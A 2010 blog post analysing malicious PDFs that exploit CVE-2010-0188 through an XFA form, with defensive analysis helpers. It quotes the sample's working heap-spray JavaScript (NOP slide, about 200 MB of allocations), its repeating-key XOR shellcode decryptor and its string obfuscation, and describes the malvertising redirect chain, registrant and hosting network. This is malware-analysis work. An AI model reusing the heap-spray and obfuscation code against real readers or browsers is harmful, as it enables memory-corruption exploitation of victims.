Friday, August 20, 2010

Analyzing CVE-2010-0188 exploits: The Legend of Pat Casey (Part 1)

Introduction

I'm going to call this: The Legend of Pat Casey. Keep reading to find out why, but I'm pretty sure there are no villains involved named Pat or Casey. The story begins in late June and early July, when I became interested in malware analysis and, subsequently, reverse engineering.

As a threat analyst intern, I nabbed a few malicious PDF samples and began researching which vulnerabilities they exploited. Using Wepawet, I saw that most samples used JavaScript as a springboard, either to hide their intent or to exploit a vulnerability. I thought to myself: awesome, I know JavaScript fairly well, let's investigate. Let me see if I can mimic Wepawet's analysis and automatic PDF parsing. Long story short, I was able to pick apart a ton of samples. Interestingly, most seemed related: they originated from the same network, used the same download vector, and exploited the same vulnerabilities. I documented most of my research in a recent article, "Exploring Recent PDF Exploits". I ended that article, and my personal research, at Windows shellcode. At that point I was in over my head, with no clear idea of how to start picking the shellcode apart. Sure, I could open it in IDA, but that afforded me very little. I needed to learn more about Windows and Windows programming before I could continue.

Well, here I am a month later, still obsessing over every new malicious PDF I can get my hands on. I know a bit more about shellcode, reverse code engineering, and PDF markup. Good thing, because this month I encountered another set of related PDFs. It took me a while to uncover the vulnerability, since it used XFA and Acrobat Forms (I knew neither). The JavaScript was embedded in an XFA form and manipulated a field through a reference to an embedded element name. A quick Google search (my search terms included "XFA, ImageEdit, and AcroForm JavaScript") led me to CVE-2010-0188, a vulnerability in LibTIFF. There are some cool analysis reports on this vulnerability; if you're interested, see BugiX and Fortinet, and for a proof of concept, BugiX (again).

Didier Stevens' PDFid will not flag this sample's JavaScript, because there are no /JS or /JavaScript keywords to count. Instead, the JavaScript is embedded in an XFA form template and runs when the form is initialized:

<field h="65mm" name="field_name" w="85mm" x="53.6501mm" y="88.6499mm">
  <event activity="initialize" name="event_name">
    <script contentType="application/x-javascript">...</script>
  </event>
  <ui><imageEdit/></ui>
</field>
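To illustrate why a keyword scan comes up empty on a sample like this, here is a rough keyword counter in the spirit of PDFiD. It is a sketch, not PDFiD's code: the keyword list and the countKeywords helper are my own assumptions. Given the layout above, you would expect /AcroForm and /XFA to show up while /JS and /JavaScript stay at zero. It only scans raw bytes, so names inside compressed object streams or written with #xx escapes slip past it.

```javascript
// Rough PDF keyword counter in the spirit of PDFiD (not its actual code).
// Limitation: scans raw text only, so names inside compressed streams or
// written with #xx escapes (e.g. /J#53) are missed.
const KEYWORDS = ["/JS", "/JavaScript", "/OpenAction", "/AcroForm", "/XFA"];

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

function countKeywords(pdfText) {
  const counts = {};
  for (const kw of KEYWORDS) {
    // A PDF name ends at whitespace, a delimiter, or end of input,
    // so "/JS" must not match inside "/JSFoo".
    const re = new RegExp(escapeRegExp(kw) + "(?=[\\s()<>\\[\\]{}/%]|$)", "g");
    counts[kw] = (pdfText.match(re) || []).length;
  }
  return counts;
}

// Usage (Node.js): read the file as latin1 so every byte maps to one character.
// const fs = require("fs");
// console.log(countKeywords(fs.readFileSync("sample.pdf", "latin1")));
```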


The JavaScript sets the rawValue of field_name to a TIFF image with an invalid parameter, triggering CVE-2010-0188. Before that, as in the samples from my previous article, it sprays the heap with shellcode.
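To look at the TIFF itself, a small header dumper helps. This sketch rests on an assumption: that the image field's rawValue holds base64-encoded TIFF data, which Node.js can decode with Buffer.from(rawValue, "base64"). parseTiff is a hypothetical helper that only exposes the byte order, the first IFD offset, and the tag entries; it does not decide whether a given value triggers CVE-2010-0188, it just puts the tag table in front of you so odd counts or offsets stand out.

```javascript
// Sketch: dump the header and first IFD of a TIFF so malformed tag values stand out.
function parseTiff(buf) {
  if (buf.length < 8) throw new Error("too short for a TIFF header");
  const order = buf.toString("latin1", 0, 2);
  if (order !== "II" && order !== "MM") throw new Error("not TIFF: bad byte-order mark");
  const le = order === "II"; // "II" = little-endian, "MM" = big-endian
  const u16 = (off) => (le ? buf.readUInt16LE(off) : buf.readUInt16BE(off));
  const u32 = (off) => (le ? buf.readUInt32LE(off) : buf.readUInt32BE(off));
  if (u16(2) !== 42) throw new Error("not TIFF: bad magic number");

  const ifdOffset = u32(4);
  const entries = [];
  let truncated = false;
  if (ifdOffset + 2 > buf.length) {
    truncated = true; // IFD offset points past the data
  } else {
    const count = u16(ifdOffset);
    for (let i = 0; i < count; i++) {
      const e = ifdOffset + 2 + i * 12; // each IFD entry is 12 bytes
      if (e + 12 > buf.length) { truncated = true; break; }
      // value is the raw 4-byte value/offset field exactly as stored
      entries.push({ tag: u16(e), type: u16(e + 2), count: u32(e + 4), value: u32(e + 8) });
    }
  }
  return { littleEndian: le, ifdOffset, entries, truncated };
}

// Usage: console.log(parseTiff(Buffer.from(rawValueFromSample, "base64")));
```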

The samples I analyzed were again related: same network, same infection vector, same exploitation format. The infection vector was also the same as in the July series. A malicious advertisement redirects the victim to a domain of the form [a-z]{5}.com (a few don't fit this pattern). That page probes the victim for Internet Explorer; if the check fails, the victim is redirected to Google. The probe is a JavaScript file called common.js, which then enumerates the browser's plugins and delivers an HCP exploit, a PDF exploit, a JAR exploit, or a Flash exploit. But it gets cooler. Here's the complete download process:

La la la, browsing some news site -> SEO delivers a malicious advertisement (a free .co.cc registration) -> some 5-letter .com domain pointing to an IP in Latvia, serving an HTML/JS file (the probe) -> a malicious PDF, but only if you have Adobe Reader installed. (How nice.)

The .co.cc redirect to a 5-letter .com domain was also familiar. In fact, if you run a whois on any of these new (August) domains, you'll see they're registered to the one and only Pat Casey: the same Pat Casey who registered the 5- and 6-letter .com domains in July (same email address). I believe this is some sort of exploit kit or malware-as-a-service, since the .co.cc redirections seem to embed customer tracking. Either way, Pat Casey's August PDF exploits are much more fun than July's. (An exploit kit update, perhaps?)
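When sifting proxy or DNS logs for this campaign, the domain shapes described above can be turned into a quick filter. This is a hypothetical sketch: classifyHost and both patterns are my own, taken from the [a-z]{5}.com and .co.cc descriptions. The landing pattern is very broad (plenty of legitimate sites have five-letter .com names), so a match is a lead to combine with other evidence such as the hosting network, not a verdict.

```javascript
// Sketch: flag hostnames matching the patterns described in this post.
const LANDING_RE = /^[a-z]{5}\.com$/; // the [a-z]{5}.com landing domains
const REDIRECTOR_RE = /\.co\.cc$/;    // free .co.cc redirectors

function classifyHost(host) {
  const h = host.trim().toLowerCase().replace(/\.$/, ""); // drop a trailing root dot
  if (LANDING_RE.test(h)) return "landing-candidate";
  if (REDIRECTOR_RE.test(h)) return "redirector-candidate";
  return "other";
}
```

For the July domains, which also used 6-letter names, the landing pattern would need widening to [a-z]{5,6}.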

Deobfuscating the JavaScript

Figure 1: The PDF Layout

I do not know much about PDF syntax, but looking at some of the objects gives a rough idea of what's happening (Figure 1). I did not dwell on understanding every bit of PDF markup, just enough to realize that the JavaScript in the XFA initialize event was malicious. I like deobfuscating JavaScript myself, since it's basically an easy pattern-matching game. It took about 20 minutes to realize that the JavaScript was performing a heap spray with shellcode, followed by a setter call on rawValue for what seemed to be the <ImageEdit> element. The way the vulnerable code was hidden is quite cool: it was distributed among variables and then joined at the end. Of course, the "join" method name was also hidden within a string of junk text and decoded with a regular expression that removed the junk. Here's an example:

var1 = func26('qrFeFtFuUrEnz zuHnbeEsUcHaZpqeD(UaD)', func6('bEFqHZDUz'));

Removing every "bEFqHZDUz" character reveals "return unescape(a)". The obfuscation is not smart: as you can see, simply dropping every other character gives the same result. A simple Python script can parse the calls to func6 and decode them. In the example, func6 turns the junk characters into a regular expression, and func26 prepends "function (a) {" to the cleaned-up string. This is how the vulnerable TIFF data is hidden, but what about the shellcode? Well, Mr. Casey is now interested in encryption, so he added a simple Vigenère-style cipher using XOR, where each character is XORed with the corresponding character of a repeating key:

/* Repeating-key XOR: character i is XORed with key character (i % key.length). */
function decryptString(string1, key) {
    var retString = '';
    for (var i = 0; i < string1.length; i++) {
        var charCode = string1.charCodeAt(i);
        var charKey = key.charCodeAt(i % key.length);
        retString += String.fromCharCode(charCode ^ charKey);
    }
    return retString;
}

shellcode = "long hex value containing encoded shellcode";
/* hex2dec() is defined elsewhere in the sample (not shown); presumably it turns the hex string into characters. */
shellcode = decryptString(hex2dec(shellcode), "shortkey");
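The post mentions a simple Python script for the first layer; to keep the examples in one language, here is a JavaScript (Node.js) sketch that peels both layers offline. All helper names are hypothetical, and the sample's own func6, func26, and hex2dec bodies are not shown here, so hexToBytes assumes hex2dec simply turns pairs of hex digits into byte values. xorWithKey performs the same operation as decryptString above, on bytes instead of string characters.

```javascript
// Layer 1: junk-character stripping, as the func6 regex does. Every character
// listed in junkChars is deleted from the obfuscated string.
function stripJunk(obfuscated, junkChars) {
  const cls = junkChars.replace(/[\]\\^-]/g, "\\$&"); // escape characters special inside [...]
  return obfuscated.replace(new RegExp("[" + cls + "]", "g"), "");
}

// Shortcut: in this sample the real characters sit at the odd indices.
function everyOtherChar(obfuscated) {
  let out = "";
  for (let i = 1; i < obfuscated.length; i += 2) out += obfuscated[i];
  return out;
}

// Layer 2a: hex decoding (assumed equivalent to the sample's hex2dec).
function hexToBytes(hex) {
  if (hex.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hex)) throw new Error("invalid hex string");
  return Buffer.from(hex, "hex");
}

// Layer 2b: repeating-key XOR. XOR is its own inverse, so this also re-encrypts.
function xorWithKey(bytes, key) {
  const k = Buffer.from(key, "latin1");
  if (k.length === 0) throw new Error("empty key");
  const out = Buffer.alloc(bytes.length);
  for (let i = 0; i < bytes.length; i++) out[i] = bytes[i] ^ k[i % k.length];
  return out;
}

const junky = "qrFeFtFuUrEnz zuHnbeEsUcHaZpqeD(UaD)";
console.log(stripJunk(junky, "bEFqHZDUz")); // return unescape(a)
console.log(everyOtherChar(junky));         // return unescape(a)

// Usage: dump the decrypted shellcode and load it in a disassembler or debugger.
// require("fs").writeFileSync("shellcode.bin", xorWithKey(hexToBytes(encodedHex), "shortkey"));
```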


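Then, as before, the script sprays the heap: it converts the decrypted shellcode into a %u-escaped Unicode string and allocates large blocks of memory filled with NOP slides that lead into copies of the shellcode:

/* Builds a %uXXXX string from pairs of characters; the high/low swap keeps the
   original byte order in memory once unescape() turns it into UTF-16 characters.
   tohex() is not shown here; presumably it returns a two-digit hex byte. */
function tounicode(input) {
    var retString = '';
    for (var i = 0; i < input.length; i += 2) {
        retString += '%u';
        retString += tohex(input.charCodeAt(i + 1));
        retString += tohex(input.charCodeAt(i));
    }
    return retString;
}

/* Doubles the string until it covers `size` bytes (2 bytes per character),
   then trims it to size / 2 characters. */
function makehuge(input, size) {
    while (input.length * 2 < size) {
        input += input;
    }
    input = input.substr(0, size / 2);
    return input;
}

var codeArray = [];  /* the sample's declaration is not shown; added so the snippet is complete */

function heapspray(input) {
    input = unescape(input);
    var len = input.length * 2;                /* shellcode size in bytes */

    var nop = unescape('%u' + '9090');         /* 0x90 0x90: two x86 NOP instructions */
    var slide = makehuge(nop, 8192 - len);

    var newcode = input + slide;               /* one 8 KB chunk: shellcode, then NOP slide */
    newcode = makehuge(newcode, 524144);       /* about 512 KB of repeated chunks */

    /* allocate a ton of it! */
    for (var i = 0; i < 400; i++) {
        codeArray[i] = newcode.substr(0, newcode.length - 1) + input;
    }
}
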
heapspray(tounicode(shellcode));
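The constants in heapspray() are easier to read as sizes. The sketch below redoes that arithmetic without allocating anything, under stated assumptions: one JavaScript string character occupies 2 bytes (UTF-16), the shellcode is shorter than 8192 bytes, and per-string engine overhead is ignored. Each 8 KB chunk is shellcode followed by a NOP slide, and the roughly 512 KB blocks repeat that chunk, so a jump landing anywhere in a slide runs into the next copy of the shellcode. sprayFootprint is a hypothetical helper name.

```javascript
// Sketch: size arithmetic behind heapspray(), computed without allocating.
function sprayFootprint(shellcodeChars, copies = 400) {
  if (shellcodeChars * 2 >= 8192) throw new Error("shellcode does not fit in an 8 KB chunk");
  // slide = makehuge(nop, 8192 - len) -> (8192 - len) / 2 chars of 0x9090
  const slideChars = (8192 - shellcodeChars * 2) / 2;
  const chunkChars = shellcodeChars + slideChars; // always 4096 chars = 8192 bytes
  // makehuge(newcode, 524144) doubles past the target, then cuts to 524144 / 2 chars
  const blockChars = 524144 / 2; // 262072 chars
  // codeArray[i] = newcode.substr(0, newcode.length - 1) + input
  const storedChars = blockChars - 1 + shellcodeChars;
  return {
    chunkBytes: chunkChars * 2,
    blockBytes: storedChars * 2,
    totalBytes: storedChars * 2 * copies,
  };
}

const footprint = sprayFootprint(200); // e.g. a 400-byte shellcode
console.log(footprint.chunkBytes);                                 // 8192
console.log((footprint.totalBytes / 2 ** 20).toFixed(1) + " MiB"); // 200.1 MiB
```

In other words, the 400 iterations pin down roughly 200 MB of attacker-controlled memory, which is what makes a hard-coded landing address likely to hit a slide.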


At the time of writing, Wepawet identified this PDF as benign, although a dynamic analysis should catch the shellcode allocated at this point.
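As an illustration of what "picking up on the allocated shellcode" could look like, here is a hypothetical heuristic (not Wepawet's actual logic). It assumes a sandbox that hooks string creation and passes each large string through a check: flag it when it is big and dominated by a single UTF-16 code unit, such as the 0x9090 NOP pair used above. The thresholds are arbitrary assumptions and would need tuning against benign documents.

```javascript
// Hypothetical heap-spray heuristic: large string dominated by one code unit.
function looksLikeSpray(str, minChars = 65536, minRatio = 0.5) {
  if (str.length < minChars) return false;
  const counts = new Map();
  let top = 0; // highest count seen for any single code unit
  for (let i = 0; i < str.length; i++) {
    const c = str.charCodeAt(i);
    const n = (counts.get(c) || 0) + 1;
    counts.set(c, n);
    if (n > top) top = n;
  }
  return top / str.length >= minRatio;
}
```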

Investigating the Attack Vector

Pat Casey registration during 8/2010

Pat Casey registration during 6/2010

This form of exploit (XFA, the obfuscation techniques) was new to me, but the attack vector and domain format were the same, and the whois registration for the new domains was identical. Last time, the .com domains were hosted in an AS in Moldova; now they resolved to an AS in Latvia (AS6851), more specifically to the 85.234.190.0/23 network. I was now determined to wrap my head around these attacks. I ran the PDF in a vulnerable version of Adobe Reader, with my VM pointed at INetSim running on the host. Through Wireshark, I saw that the shellcode acts as a bootstrap: it downloads an executable from a URI embedded in the shellcode and launches it, the same technique used in June and July.
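Checking whether a resolved IP belongs to that network is simple arithmetic: a /23 fixes the first 23 bits, so it spans 2^9 = 512 addresses, from 85.234.190.0 through 85.234.191.255. A minimal sketch (ipv4ToInt and inCidr are hypothetical helper names):

```javascript
// Sketch: test whether an IPv4 address falls inside a CIDR block.
function ipv4ToInt(ip) {
  const parts = ip.split(".");
  if (parts.length !== 4) throw new Error("bad IPv4 address: " + ip);
  let n = 0;
  for (const p of parts) {
    if (!/^\d{1,3}$/.test(p) || Number(p) > 255) throw new Error("bad IPv4 octet: " + p);
    n = n * 256 + Number(p); // plain arithmetic avoids signed 32-bit bitwise results
  }
  return n;
}

function inCidr(ip, cidr) {
  const [base, bitsText] = cidr.split("/");
  const bits = Number(bitsText);
  if (!Number.isInteger(bits) || bits < 0 || bits > 32) throw new Error("bad prefix length: " + cidr);
  const size = 2 ** (32 - bits);                           // addresses in the block (512 for a /23)
  const start = Math.floor(ipv4ToInt(base) / size) * size; // network address
  const addr = ipv4ToInt(ip);
  return addr >= start && addr < start + size;
}

console.log(inCidr("85.234.191.10", "85.234.190.0/23")); // true
console.log(inCidr("85.234.192.10", "85.234.190.0/23")); // false
```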

The next step in my analysis was to download the executable and find its purpose. Hopefully it would reveal the goal of the exploit pack, or at least provide a signature to help identify what type of malware Pat Casey is distributing.

This is where I ran into a roadblock. I tried to download the PE file, but instead I received a small chunk of HTML that redirects a web browser to Google. I was convinced it was an anti-analysis technique, and guessed that the author expired the URI after a set amount of time. (I said I was determined, right?) So I wrote a script that emailed me an alert whenever a new domain in AS6851 was submitted to clean-MX. My plan was to act on each alert immediately: download the page, download the PDF, run it, extract the URI of the PE download, and fetch the file quickly. It took a few days until an email alert fired while I wasn't at work, but alas, after 20 minutes of fooling around, the link was bad again. (Was I really racing against time?)
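The core of such an alert script is just "remember what was already seen, report what is new." The sketch below shows only that part. How the clean-MX listing is fetched and how the email is sent are deliberately left out: fetchListing and sendAlert in the comments are hypothetical placeholders, not a real clean-MX API.

```javascript
// Sketch: report only domains not seen in earlier polls.
function newDomains(seen, listing) {
  const fresh = [];
  for (const raw of listing) {
    const domain = raw.trim().toLowerCase();
    if (domain && !seen.has(domain)) {
      seen.add(domain); // remember it so the next poll stays quiet
      fresh.push(domain);
    }
  }
  return fresh;
}

// Possible polling loop (hypothetical helpers):
// const seen = new Set();
// setInterval(async () => {
//   const fresh = newDomains(seen, await fetchListing("AS6851"));
//   if (fresh.length > 0) await sendAlert(fresh);
// }, 5 * 60 * 1000);
```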

In the next part I'll walk through a bit of a learning experience using OllyDbg to decipher the shellcode, along with the solution to my race against time. I'll also talk a bit about Pat Casey's anti-analysis techniques and, hopefully, reveal more information about the exploit pack.

To be continued...
